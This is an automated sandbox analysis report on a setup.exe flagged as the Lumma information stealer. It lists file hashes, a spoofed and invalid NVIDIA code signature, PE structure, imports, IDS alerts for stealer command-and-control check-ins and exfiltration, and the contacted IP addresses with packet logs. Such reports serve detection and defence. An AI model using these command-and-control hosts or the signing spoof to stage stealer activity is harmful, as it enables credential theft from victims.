                                                                                                                        • 185.161.251.21
                                                                                                                        DansMinistrie.exeGet hashmaliciousLummaCBrowse
                                                                                                                        • 104.21.96.1
                                                                                                                        • 185.161.251.21
                                                                                                                        CrosshairX.exeGet hashmaliciousLummaCBrowse
                                                                                                                        • 104.21.96.1
                                                                                                                        • 185.161.251.21

                                                                                                                        Dropped Files

                                                                                                                        No context

                                                                                                                        Created / dropped Files

                                                                                                                        No created / dropped files found

                                                                                                                        Static File Info

                                                                                                                        General

                                                                                                                        File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                        Entropy (8bit):0.46184887307140493
                                                                                                                        TrID:
                                                                                                                        • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                                                                        • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                                                        • DOS Executable Generic (2002/1) 0.02%
                                                                                                                        • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                                        File name:setup.exe
                                                                                                                        File size:74'715'544 bytes
                                                                                                                        MD5:86a4951d8e5a083679b90f2509f215fe
                                                                                                                        SHA1:426588739b61c2af6b584bfda1a571a9ee991ef7
                                                                                                                        SHA256:56ba7331a6db894aa092ecfc8bf691ae04ba7e5c6b4e3ba1067e67ce43f5e673
                                                                                                                        SHA512:6204ab5d09ea50462a9968b4f3171a60d3cefe578d9ed294c3e88a96ee5373d6fc5a929d4314b176a2da834a30de0c62d682a969c512298c802941996c7bd8b2
                                                                                                                        SSDEEP:24576:3RCePueJQjfQ4VTixBjK1aeXjfLiaE4JYCudSW:3RCeHJmLTixBjK8C/JY
                                                                                                                        TLSH:D9F79E217ED303E59B4277794B0EB7DF9F28B190DB9314FB524A024696C24F8433E96A
                                                                                                                        File Content Preview:MZ......................@...................................(...........!..L.!This program cannot be run in DOS mode....$.........jw...$...$...$...%...$d..%...$.d.$...$...%...$...%<..$...%...$.d.%...$.d.%...$.d.%\..$...%...$...$S..$rd.%...$rd.$...$...$...

                                                                                                                        File Icon

                                                                                                                        Icon Hash:336d16b6e468712b

                                                                                                                        Static PE Info

                                                                                                                        General

                                                                                                                        Entrypoint:0x446ffc
                                                                                                                        Entrypoint Section:.text
                                                                                                                        Digitally signed:true
                                                                                                                        Imagebase:0x400000
                                                                                                                        Subsystem:windows gui
                                                                                                                        Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                                                                        DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
                                                                                                                        Time Stamp:0x67696948 [Mon Dec 23 13:44:40 2024 UTC]
                                                                                                                        TLS Callbacks:
                                                                                                                        CLR (.Net) Version:
                                                                                                                        OS Version Major:6
                                                                                                                        OS Version Minor:0
                                                                                                                        File Version Major:6
                                                                                                                        File Version Minor:0
                                                                                                                        Subsystem Version Major:6
                                                                                                                        Subsystem Version Minor:0
                                                                                                                        Import Hash:7e682a095f6400abd9015fa73bb7cbe7

                                                                                                                        Authenticode Signature

                                                                                                                        Signature Valid:false
                                                                                                                        Signature Issuer:CN=VeriSign Class 3 Code Signing 2010 CA, OU=Terms of use at https://www.verisign.com/rpa (c)10, OU=VeriSign Trust Network, O="VeriSign, Inc.", C=US
                                                                                                                        Signature Validation Error:The digital signature of the object did not verify
                                                                                                                        Error Number:-2146869232
                                                                                                                        Not Before, Not After
                                                                                                                        • 27/07/2015 20:00:00 26/07/2018 19:59:59
                                                                                                                        Subject Chain
                                                                                                                        • CN=NVIDIA Corporation, O=NVIDIA Corporation, L=SANTA CLARA, S=California, C=US
                                                                                                                        Version:3
                                                                                                                        Thumbprint MD5:F7219078FBE20BC1B98BF8A86BFC0396
                                                                                                                        Thumbprint SHA-1:30632EA310114105969D0BDA28FDCE267104754F
                                                                                                                        Thumbprint SHA-256:1B5061CF61C93822BDE2433156EEBE1F027C8FA9C88A4AF0EBD1348AF79C61E2
                                                                                                                        Serial:14781BC862E8DC503A559346F5DCC518

                                                                                                                        Entrypoint Preview

                                                                                                                        Instruction
                                                                                                                        call 00007F0988E4388Fh
                                                                                                                        jmp 00007F0988E42C8Fh
                                                                                                                        cmp ecx, dword ptr [004BF540h]
                                                                                                                        jne 00007F0988E42E13h
                                                                                                                        ret
                                                                                                                        jmp 00007F0988E430BEh
                                                                                                                        push ebp
                                                                                                                        mov ebp, esp
                                                                                                                        mov eax, dword ptr [ebp+08h]
                                                                                                                        push esi
                                                                                                                        mov ecx, dword ptr [eax+3Ch]
                                                                                                                        add ecx, eax
                                                                                                                        movzx eax, word ptr [ecx+14h]
                                                                                                                        lea edx, dword ptr [ecx+18h]
                                                                                                                        add edx, eax
                                                                                                                        movzx eax, word ptr [ecx+06h]
                                                                                                                        imul esi, eax, 28h
                                                                                                                        add esi, edx
                                                                                                                        jmp 00007F0988E42E27h
                                                                                                                        mov ecx, dword ptr [edx+0Ch]
                                                                                                                        cmp dword ptr [ebp+0Ch], ecx
                                                                                                                        jc 00007F0988E42E1Ch
                                                                                                                        mov eax, dword ptr [edx+08h]
                                                                                                                        add eax, ecx
                                                                                                                        cmp dword ptr [ebp+0Ch], eax
                                                                                                                        jc 00007F0988E42E1Eh
                                                                                                                        add edx, 28h
                                                                                                                        cmp edx, esi
                                                                                                                        jne 00007F0988E42DF9h
                                                                                                                        xor eax, eax
                                                                                                                        pop esi
                                                                                                                        pop ebp
                                                                                                                        ret
                                                                                                                        mov eax, edx
                                                                                                                        jmp 00007F0988E42E0Bh
                                                                                                                        push esi
                                                                                                                        call 00007F0988E43E65h
                                                                                                                        test eax, eax
                                                                                                                        je 00007F0988E42E32h
                                                                                                                        mov eax, dword ptr fs:[00000018h]
                                                                                                                        mov esi, 004C3C38h
                                                                                                                        mov edx, dword ptr [eax+04h]
                                                                                                                        jmp 00007F0988E42E16h
                                                                                                                        cmp edx, eax
                                                                                                                        je 00007F0988E42E22h
                                                                                                                        xor eax, eax
                                                                                                                        mov ecx, edx
                                                                                                                        lock cmpxchg dword ptr [esi], ecx
                                                                                                                        test eax, eax
                                                                                                                        jne 00007F0988E42E02h
                                                                                                                        xor al, al
                                                                                                                        pop esi
                                                                                                                        ret
                                                                                                                        mov al, 01h
                                                                                                                        pop esi
                                                                                                                        ret
                                                                                                                        push ebp
                                                                                                                        mov ebp, esp
                                                                                                                        cmp dword ptr [ebp+08h], 00000000h
                                                                                                                        jne 00007F0988E42E19h
                                                                                                                        mov byte ptr [004C3C3Ch], 00000001h
                                                                                                                        call 00007F0988E43AF7h
                                                                                                                        call 00007F0988E6BA1Eh
                                                                                                                        test al, al
                                                                                                                        jne 00007F0988E42E16h
                                                                                                                        xor al, al
                                                                                                                        pop ebp
                                                                                                                        ret
                                                                                                                        call 00007F0988E7CE6Bh
                                                                                                                        test al, al
                                                                                                                        jne 00007F0988E42E1Ch
                                                                                                                        push 00000000h
                                                                                                                        call 00007F0988E6BA25h
                                                                                                                        pop ecx
                                                                                                                        jmp 00007F0988E42DFBh
                                                                                                                        mov al, 01h
                                                                                                                        pop ebp
                                                                                                                        ret
                                                                                                                        push ebp
                                                                                                                        mov ebp, esp

                                                                                                                        Rich Headers

                                                                                                                        Programming Language:
                                                                                                                        • [ C ] VS2015 UPD3.1 build 24215

                                                                                                                        Data Directories

                                                                                                                        NameVirtual AddressVirtual Size Is in Section
                                                                                                                        IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                                        IMAGE_DIRECTORY_ENTRY_IMPORT0xbc0c40x168.rdata
                                                                                                                        IMAGE_DIRECTORY_ENTRY_RESOURCE0xc90000x8230.rsrc
                                                                                                                        IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                                        IMAGE_DIRECTORY_ENTRY_SECURITY0x473d7d80x39c0
                                                                                                                        IMAGE_DIRECTORY_ENTRY_BASERELOC0xd20000x8224.reloc
                                                                                                                        IMAGE_DIRECTORY_ENTRY_DEBUG0xb4f500x70.rdata
                                                                                                                        IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                                        IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                                        IMAGE_DIRECTORY_ENTRY_TLS0xb4fc00x18.rdata
                                                                                                                        IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0xb4e900x40.rdata
                                                                                                                        IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                                        IMAGE_DIRECTORY_ENTRY_IAT0x960000x700.rdata
                                                                                                                        IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                                        IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                                                        IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                                                                        Sections

                                                                                                                        NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                                        .text0x10000x949aa0x94a002f0b1e6e7209e42f721cc89975d96484False0.550125827901598zlib compressed data6.684942206445448IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                                                        .rdata0x960000x286e40x288004d768e6b75d1f20ec35737ac3b3709feFalse0.3889551986882716data5.172232114590233IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                        .data0xbf0000x9f1c0x2e00f0b1d2ae3052872b46593f307ac260acFalse0.31241508152173914DOS executable (block device driver)4.45629832023611IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                        .rsrc0xc90000x82300x8400d5fc66a55ac86cebe4c9b4b54cc731b3False0.37621330492424243data4.741658203644316IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                        .reloc0xd20000x5d0000x5d0003c1bacd0947ddab54a3ad072fd7b6444False0.6855389994959677data7.55788260664986IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                                                                                        Resources

                                                                                                                        NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                                                        AFX_DIALOG_LAYOUT0xca7500x2dataEnglishUnited States5.0
                                                                                                                        AFX_DIALOG_LAYOUT0xca7480x2dataEnglishUnited States5.0
                                                                                                                        RT_CURSOR0xcd5800x134Targa image data - RGB 64 x 65536 x 1 +32 "\001"EnglishUnited States0.4805194805194805
                                                                                                                        RT_CURSOR0xcd6b80xb4Targa image data - Map 32 x 65536 x 1 +16 "\001"EnglishUnited States0.7
                                                                                                                        RT_CURSOR0xcd7980x134AmigaOS bitmap font "(", fc_YSize 4294967264, 5120 elements, 2nd "\377\360?\377\377\370\177\377\377\374\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377", 3rdEnglishUnited States0.36363636363636365
                                                                                                                        RT_CURSOR0xcd8e80x134Targa image data - RLE 64 x 65536 x 1 +32 "\001"EnglishUnited States0.35714285714285715
                                                                                                                        RT_CURSOR0xcda380x134dataEnglishUnited States0.37337662337662336
                                                                                                                        RT_CURSOR0xcdb880x134dataEnglishUnited States0.37662337662337664
                                                                                                                        RT_CURSOR0xcdcd80x134Targa image data 64 x 65536 x 1 +32 "\001"EnglishUnited States0.36688311688311687
                                                                                                                        RT_CURSOR0xcde280x134Targa image data 64 x 65536 x 1 +32 "\001"EnglishUnited States0.37662337662337664
                                                                                                                        RT_CURSOR0xcdf780x134Targa image data - Mono - RLE 64 x 65536 x 1 +32 "\001"EnglishUnited States0.36688311688311687
                                                                                                                        RT_CURSOR0xce0c80x134Targa image data - RGB - RLE 64 x 65536 x 1 +32 "\001"EnglishUnited States0.38636363636363635
                                                                                                                        RT_CURSOR0xce2180x134dataEnglishUnited States0.44155844155844154
                                                                                                                        RT_CURSOR0xce3680x134dataEnglishUnited States0.4155844155844156
                                                                                                                        RT_CURSOR0xce4b80x134AmigaOS bitmap font "(", fc_YSize 4294966847, 3840 elements, 2nd "\377?\374\377\377\300\003\377\377\300\003\377\377\340\007\377\377\360\017\377\377\370\037\377\377\374?\377\377\376\177\377\377\377\377\377\377\377\377\377\377\377\377\377", 3rdEnglishUnited States0.5422077922077922
                                                                                                                        RT_CURSOR0xce6080x134dataEnglishUnited States0.2662337662337662
                                                                                                                        RT_CURSOR0xce7580x134dataEnglishUnited States0.2824675324675325
                                                                                                                        RT_CURSOR0xce8a80x134dataEnglishUnited States0.3246753246753247
                                                                                                                        RT_BITMAP0xceb180xb8Device independent bitmap graphic, 12 x 10 x 4, image size 80EnglishUnited States0.44565217391304346
                                                                                                                        RT_BITMAP0xcebd00x144Device independent bitmap graphic, 33 x 11 x 4, image size 220EnglishUnited States0.37962962962962965
                                                                                                                        RT_ICON0xca8980x1ca8Device independent bitmap graphic, 48 x 96 x 24, image size 6912SwedishSweden0.5331243184296619
                                                                                                                        RT_ICON0xcc5400xca8Device independent bitmap graphic, 32 x 64 x 24, image size 3072SwedishSweden0.5916666666666667
                                                                                                                        RT_ICON0xcd1e80x368Device independent bitmap graphic, 16 x 32 x 24, image size 768SwedishSweden0.7362385321100917
                                                                                                                        RT_DIALOG0xc9cd00x168dataEnglishUnited States0.5861111111111111
                                                                                                                        RT_DIALOG0xc9e380x1e2dataEnglishUnited States0.5601659751037344
                                                                                                                        RT_DIALOG0xca0200x37cdataEnglishUnited States0.44506726457399104
                                                                                                                        RT_DIALOG0xca7580x140dataSwedishSweden0.596875
                                                                                                                        RT_DIALOG0xce9f80xe8dataEnglishUnited States0.6336206896551724
                                                                                                                        RT_DIALOG0xceae00x34dataEnglishUnited States0.9038461538461539
                                                                                                                        RT_STRING0xced180xe0dataEnglishUnited States0.6741071428571429
                                                                                                                        RT_STRING0xcedf80x100dataEnglishUnited States0.44921875
                                                                                                                        RT_STRING0xceef80x82StarOffice Gallery theme p, 536899072 objects, 1st nEnglishUnited States0.7153846153846154
                                                                                                                        RT_STRING0xcef800x2adataEnglishUnited States0.5476190476190477
                                                                                                                        RT_STRING0xcefb00x184dataEnglishUnited States0.48711340206185566
                                                                                                                        RT_STRING0xcf1380x4eedataEnglishUnited States0.375594294770206
                                                                                                                        RT_STRING0xcf9b80x264dataEnglishUnited States0.3333333333333333
                                                                                                                        RT_STRING0xcf6d80x2dadataEnglishUnited States0.3698630136986301
                                                                                                                        RT_STRING0xd04000x8adataEnglishUnited States0.6594202898550725
                                                                                                                        RT_STRING0xcf6280xacdataEnglishUnited States0.45348837209302323
                                                                                                                        RT_STRING0xd02f00xdedataEnglishUnited States0.536036036036036
                                                                                                                        RT_STRING0xcfc200x4a8dataEnglishUnited States0.3221476510067114
                                                                                                                        RT_STRING0xd00c80x228dataEnglishUnited States0.4003623188405797
                                                                                                                        RT_STRING0xd03d00x2cdataEnglishUnited States0.5227272727272727
                                                                                                                        RT_STRING0xd04900x53edataEnglishUnited States0.2965722801788376
                                                                                                                        RT_GROUP_CURSOR0xcd7700x22Lotus unknown worksheet or configuration, revision 0x2EnglishUnited States1.0294117647058822
                                                                                                                        RT_GROUP_CURSOR0xcdf600x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States1.3
                                                                                                                        RT_GROUP_CURSOR0xcd8d00x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States1.3
                                                                                                                        RT_GROUP_CURSOR0xcde100x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States1.3
                                                                                                                        RT_GROUP_CURSOR0xcdcc00x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States1.3
                                                                                                                        RT_GROUP_CURSOR0xce5f00x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States1.3
                                                                                                                        RT_GROUP_CURSOR0xcdb700x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States1.3
                                                                                                                        RT_GROUP_CURSOR0xce2000x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States1.3
                                                                                                                        RT_GROUP_CURSOR0xcda200x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States1.3
                                                                                                                        RT_GROUP_CURSOR0xce0b00x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States1.3
                                                                                                                        RT_GROUP_CURSOR0xce3500x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States1.3
                                                                                                                        RT_GROUP_CURSOR0xce4a00x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States1.3
                                                                                                                        RT_GROUP_CURSOR0xce7400x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States1.3
                                                                                                                        RT_GROUP_CURSOR0xce8900x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States1.3
                                                                                                                        RT_GROUP_CURSOR0xce9e00x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States1.3
                                                                                                                        RT_GROUP_ICON0xcd5500x30dataSwedishSweden0.875
                                                                                                                        RT_VERSION0xca3a00x3a4dataEnglishUnited States0.4270386266094421
                                                                                                                        RT_MANIFEST0xd09d00x860XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with very long lines (2084), with CRLF line terminatorsEnglishUnited States0.3148320895522388

                                                                                                                        Imports

                                                                                                                        DLLImport
                                                                                                                        VERSION.dllVerQueryValueW, GetFileVersionInfoSizeW, GetFileVersionInfoW
                                                                                                                        KERNEL32.dllSetErrorMode, GlobalFlags, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, GlobalReAlloc, GlobalHandle, LocalAlloc, LocalReAlloc, GetSystemDefaultUILanguage, GetFullPathNameW, GetVolumeInformationW, SetEndOfFile, GetFileAttributesExW, UnhandledExceptionFilter, TerminateProcess, IsProcessorFeaturePresent, GetPrivateProfileStringW, InitializeSListHead, GetStartupInfoW, GetConsoleOutputCP, GetPrivateProfileIntW, ResumeThread, GetStringTypeW, GetCPInfo, GetFileAttributesA, CreateMutexA, RtlUnwind, CreateThread, ExitThread, FreeLibraryAndExitThread, GetModuleHandleExW, GetCommandLineA, GetCommandLineW, HeapQueryInformation, GetStdHandle, ExitProcess, LCMapStringW, GetDriveTypeW, GetTimeZoneInformation, IsValidCodePage, GetOEMCP, lstrcmpA, GetCurrentThread, CompareStringW, GlobalFindAtomW, GlobalAddAtomW, lstrcmpW, GlobalDeleteAtom, LoadLibraryA, LoadLibraryExW, GetSystemDirectoryW, EncodePointer, FormatMessageW, LocalFree, InitializeCriticalSectionAndSpinCount, GetACP, FindFirstFileExW, DosDateTimeToFileTime, SystemTimeToFileTime, GetFileType, DuplicateHandle, GetEnvironmentStringsW, FreeEnvironmentStringsW, SetEnvironmentVariableW, SetStdHandle, GetProcessHeap, WritePrivateProfileStringW, DecodePointer, HeapAlloc, HeapReAlloc, HeapSize, InitializeCriticalSectionEx, HeapFree, OpenProcess, MapViewOfFile, CreateFileMappingW, IsBadReadPtr, UnmapViewOfFile, FlushFileBuffers, FileTimeToSystemTime, SystemTimeToTzSpecificLocalTime, GetUserDefaultLangID, FindClose, FindNextFileW, FindFirstFileW, CompareFileTime, GetModuleHandleA, RemoveDirectoryW, SetFileTime, lstrcpynW, FileTimeToDosDateTime, IsDebuggerPresent, GetFileTime, VirtualQuery, GlobalMemoryStatus, GetSystemTimeAsFileTime, lstrcpyW, GetCurrentProcessId, GetLocalTime, FileTimeToLocalFileTime, GetSystemInfo, RaiseException, lstrcatW, OutputDebugStringW, GetUserDefaultUILanguage, GetModuleHandleW, GetLocaleInfoW, IsWow64Process, SetUnhandledExceptionFilter, ReleaseMutex, CreateMutexW, CreateProcessW, GetModuleFileNameW, GetCurrentProcess, VerifyVersionInfoW, VerSetConditionMask, MoveFileW, SetFileAttributesW, DeleteFileW, CreateDirectoryW, Sleep, GetLongPathNameW, GetTempPathW, SetCurrentDirectoryW, GetCurrentDirectoryW, GetFileAttributesW, GetVersionExW, lstrlenA, WinExec, GlobalUnlock, GlobalLock, GlobalAlloc, MulDiv, GetWindowsDirectoryW, GetCurrentThreadId, OutputDebugStringA, WideCharToMultiByte, lstrlenW, SetEvent, GetFileSizeEx, GetFileSize, LeaveCriticalSection, EnterCriticalSection, DeleteCriticalSection, InitializeCriticalSection, CreateEventW, WriteFile, ReadFile, CloseHandle, SetFilePointer, CreateFileW, FindResourceW, LoadResource, LockResource, SizeofResource, GlobalFree, DebugBreak, GetLastError, WaitForSingleObject, MultiByteToWideChar, SetLastError, GetProcAddress, FreeLibrary, LoadLibraryW, GetConsoleMode, SetFilePointerEx, ReadConsoleW, QueryPerformanceCounter, WriteConsoleW
                                                                                                                        USER32.dllAdjustWindowRectEx, GetWindowTextLengthW, GetWindowTextW, RemovePropW, GetPropW, SetPropW, GetScrollRange, SetScrollRange, GetScrollPos, ValidateRect, SetForegroundWindow, GetForegroundWindow, SetActiveWindow, TrackPopupMenu, SetMenu, GetMenu, SetFocus, GetDlgCtrlID, EndDeferWindowPos, DeferWindowPos, BeginDeferWindowPos, SetWindowPos, DestroyWindow, IsChild, IsMenu, CreateWindowExW, GetClassInfoExW, RegisterClassW, CallWindowProcW, GetMessageTime, GetMessagePos, PeekMessageW, DispatchMessageW, GetLastActivePopup, GetWindowLongW, IsWindowEnabled, GetMenuItemCount, GetMenuItemID, GetSubMenu, MapWindowPoints, EndPaint, BeginPaint, GetWindowDC, SendDlgItemMessageA, UnregisterClassW, GetWindowThreadProcessId, GetShellWindow, EqualRect, GetIconInfo, DrawIconEx, EnumChildWindows, ReleaseDC, CopyRect, ClientToScreen, GetCapture, CharPrevW, CharNextW, DrawEdge, OffsetRect, MessageBoxW, wvsprintfW, KillTimer, SetTimer, DrawIcon, IsIconic, PostQuitMessage, GetSystemMenu, LoadIconW, MoveWindow, GetDlgItem, GetWindowRect, GetDesktopWindow, wsprintfW, GetTabbedTextExtentW, GetSysColor, GrayStringW, DrawTextExW, TabbedTextOutW, UpdateWindow, EnableWindow, ScreenToClient, AppendMenuW, SetWindowLongW, GetClassLongW, GetTopWindow, GetWindow, SetWindowsHookExW, UnhookWindowsHookEx, CallNextHookEx, SetScrollInfo, GetScrollInfo, WinHelpW, MonitorFromWindow, GetMonitorInfoW, ShowWindow, CreatePopupMenu, SetCursor, GetFocus, CloseClipboard, SetClipboardData, EmptyClipboard, OpenClipboard, SendMessageW, IsWindow, GetParent, ReleaseCapture, SetCapture, GetSystemMetrics, GetKeyState, CreateCaret, DestroyCaret, PostMessageW, IsWindowVisible, DefWindowProcW, GetClassInfoW, CopyIcon, LoadCursorW, RegisterWindowMessageW, SystemParametersInfoW, FillRect, SetRectEmpty, PtInRect, HideCaret, SetCaretPos, ShowCaret, GetClientRect, DrawTextW, SetWindowTextW, IsDialogMessageW, CheckMenuItem, EnableMenuItem, SetMenuItemBitmaps, GetMenuCheckMarkDimensions, SetMenuItemInfoW, LoadBitmapW, DestroyMenu, CreateDialogIndirectParamW, EndDialog, GetNextDlgTabItem, GetActiveWindow, GetMessageW, TranslateMessage, GetCursorPos, CharUpperW, GetSysColorBrush, RealChildWindowFromPoint, RedrawWindow, WindowFromPoint, GetDC, InvalidateRect, GetTabbedTextExtentA, TabbedTextOutA, GetClassNameW
                                                                                                                        GDI32.dllEscape, GetBrushOrgEx, SetBrushOrgEx, Rectangle, SetPixelV, CreatePatternBrush, GetCharABCWidthsW, GetTextMetricsW, DeleteDC, CreateBitmap, GetClipBox, RestoreDC, SaveDC, SetBkColor, SetBkMode, SetMapMode, ExtTextOutW, SetTextColor, SetViewportExtEx, SetViewportOrgEx, SetWindowExtEx, SetWindowOrgEx, OffsetViewportOrgEx, ScaleViewportExtEx, ScaleWindowExtEx, DPtoLP, RectVisible, TextOutW, PtVisible, CreateFontIndirectW, GetObjectW, GetDeviceCaps, BitBlt, GetBkColor, CreateCompatibleBitmap, CreateCompatibleDC, TextOutA, GetStockObject, Ellipse, LineTo, MoveToEx, SelectObject, CreateSolidBrush, CreatePen, GetTextExtentPoint32W, GetTextExtentPoint32A, DeleteObject
                                                                                                                        COMDLG32.dllCommDlgExtendedError
                                                                                                                        WINSPOOL.DRVOpenPrinterW, DocumentPropertiesW, ClosePrinter
                                                                                                                        ADVAPI32.dllAdjustTokenPrivileges, RegQueryValueW, RegEnumValueW, RegEnumKeyW, RegDeleteValueW, RegDeleteKeyW, DuplicateTokenEx, RegOpenKeyExW, LookupPrivilegeValueW, GetUserNameW, RegSetValueExW, RegQueryValueExW, GetTokenInformation, OpenProcessToken, RegCreateKeyExW, RegCloseKey
                                                                                                                        SHELL32.dllDragQueryFileW, DragFinish, ShellExecuteW, SHFileOperationW, SHGetSpecialFolderPathW, ShellExecuteExW, SHBrowseForFolderW, DragAcceptFiles, SHGetMalloc, SHGetPathFromIDListW
                                                                                                                        COMCTL32.dll
                                                                                                                        SHLWAPI.dllPathRemoveFileSpecW, PathStripToRootW, PathFindExtensionW, PathFindFileNameW, PathIsUNCW, SHCopyKeyW
                                                                                                                        ole32.dllCoUninitialize, CoCreateInstance, CoInitialize, CoTaskMemFree, CoCreateGuid, CoInitializeEx
                                                                                                                        OLEAUT32.dllSysAllocString, VariantChangeType, VariantClear, VariantInit, SysFreeString
                                                                                                                        WS2_32.dllWSAStartup, WSASetLastError, WSACleanup
                                                                                                                        NETAPI32.dllNetApiBufferFree, NetServerGetInfo
                                                                                                                        MPR.dllWNetAddConnection3W
                                                                                                                        dbghelp.dllMiniDumpWriteDump
                                                                                                                        OLEACC.dllCreateStdAccessibleObject, LresultFromObject

                                                                                                                        Possible Origin

                                                                                                                        Language of compilation systemCountry where language is spokenMap
                                                                                                                        EnglishUnited States
                                                                                                                        SwedishSweden

                                                                                                                        Network Behavior

                                                                                                                        Suricata IDS Alerts

                                                                                                                        TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                                                        2025-01-06T15:40:22.509497+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449749104.21.96.1443TCP
                                                                                                                        2025-01-06T15:40:23.125271+01002049836ET MALWARE Lumma Stealer Related Activity1192.168.2.449749104.21.96.1443TCP
                                                                                                                        2025-01-06T15:40:23.125271+01002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.449749104.21.96.1443TCP
                                                                                                                        2025-01-06T15:40:23.593631+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449750104.21.96.1443TCP
                                                                                                                        2025-01-06T15:40:24.062654+01002049812ET MALWARE Lumma Stealer Related Activity M21192.168.2.449750104.21.96.1443TCP
                                                                                                                        2025-01-06T15:40:24.062654+01002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.449750104.21.96.1443TCP
                                                                                                                        2025-01-06T15:40:24.678803+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449751104.21.96.1443TCP
                                                                                                                        2025-01-06T15:40:25.482275+01002048094ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration1192.168.2.449751104.21.96.1443TCP
                                                                                                                        2025-01-06T15:40:26.058271+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449752104.21.96.1443TCP
                                                                                                                        2025-01-06T15:40:27.378073+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449753104.21.96.1443TCP
                                                                                                                        2025-01-06T15:40:28.816189+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449754104.21.96.1443TCP
                                                                                                                        2025-01-06T15:40:29.767356+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449755104.21.96.1443TCP
                                                                                                                        2025-01-06T15:40:30.831235+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449756104.21.96.1443TCP
                                                                                                                        2025-01-06T15:40:31.320736+01002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.449756104.21.96.1443TCP
                                                                                                                        2025-01-06T15:40:32.095620+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449757185.161.251.21443TCP

                                                                                                                        Network Port Distribution

                                                                                                                        TCP Packets

                                                                                                                        TimestampSource PortDest PortSource IPDest IP
                                                                                                                        Jan 6, 2025 15:40:22.036484957 CET49749443192.168.2.4104.21.96.1
                                                                                                                        Jan 6, 2025 15:40:22.036513090 CET44349749104.21.96.1192.168.2.4
                                                                                                                        Jan 6, 2025 15:40:22.036571980 CET49749443192.168.2.4104.21.96.1
                                                                                                                        Jan 6, 2025 15:40:22.040091038 CET49749443192.168.2.4104.21.96.1
                                                                                                                        Jan 6, 2025 15:40:22.040102005 CET44349749104.21.96.1192.168.2.4
                                                                                                                        Jan 6, 2025 15:40:22.509396076 CET44349749104.21.96.1192.168.2.4
                                                                                                                        Jan 6, 2025 15:40:22.509496927 CET49749443192.168.2.4104.21.96.1
                                                                                                                        Jan 6, 2025 15:40:22.512192011 CET49749443192.168.2.4104.21.96.1
                                                                                                                        Jan 6, 2025 15:40:22.512201071 CET44349749104.21.96.1192.168.2.4
                                                                                                                        Jan 6, 2025 15:40:22.512504101 CET44349749104.21.96.1192.168.2.4
                                                                                                                        Jan 6, 2025 15:40:22.558418989 CET49749443192.168.2.4104.21.96.1
                                                                                                                        Jan 6, 2025 15:40:22.575268984 CET49749443192.168.2.4104.21.96.1
                                                                                                                        Jan 6, 2025 15:40:22.575300932 CET49749443192.168.2.4104.21.96.1
                                                                                                                        Jan 6, 2025 15:40:22.575412989 CET44349749104.21.96.1192.168.2.4
                                                                                                                        Jan 6, 2025 15:40:23.125279903 CET44349749104.21.96.1192.168.2.4
                                                                                                                        Jan 6, 2025 15:40:23.125382900 CET44349749104.21.96.1192.168.2.4
                                                                                                                        Jan 6, 2025 15:40:23.125479937 CET49749443192.168.2.4104.21.96.1
